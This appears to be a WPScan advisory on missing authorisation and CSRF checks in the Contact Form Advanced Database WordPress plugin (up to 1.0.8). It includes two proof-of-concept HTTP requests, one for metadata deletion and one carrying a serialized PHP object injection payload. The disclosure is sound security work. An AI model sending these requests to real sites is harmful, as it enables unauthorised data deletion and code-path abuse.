WordPress Plugin Vulnerabilities
Contact Form Advanced Database <= 1.0.8 - Unauthorised AJAX Calls
Description
The plugin does not have any authorisation as well as CSRF checks in its delete_cf7_data and export_cf7_data AJAX actions, available to any authenticated users, which could allow users with a role as low as subscriber to call them. The delete_cf7_data would lead to arbitrary metadata deletion, as well as PHP Object Injection if a suitable gadget chain is present in another plugin, as user data is passed to the maybe_unserialize() function without being first validated.
Proof of Concept
To delete the _edit_lock metadata of the post ID 18:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close
Cookie: [any authenticated user]
action=delete_cf7_data&data%5b0%5d%5bid%5d=18&data%5b0%5d%5bkey%5d=_edit_lock
To prove the object injection, we inserted a new class in the plugin file:
# class InjectionPoint{public function __destruct(){die("OBJECT INJECTION");}}
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Connection: close
Cookie: [any authenticated user]
action=delete_cf7_data&data[0][id]=1data[0][key]=test&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=
Affects Plugins
No known fix References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Quentin VILLAIN (3wsec)
Submitter
Quentin VILLAIN (3wsec)
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)
WPScan 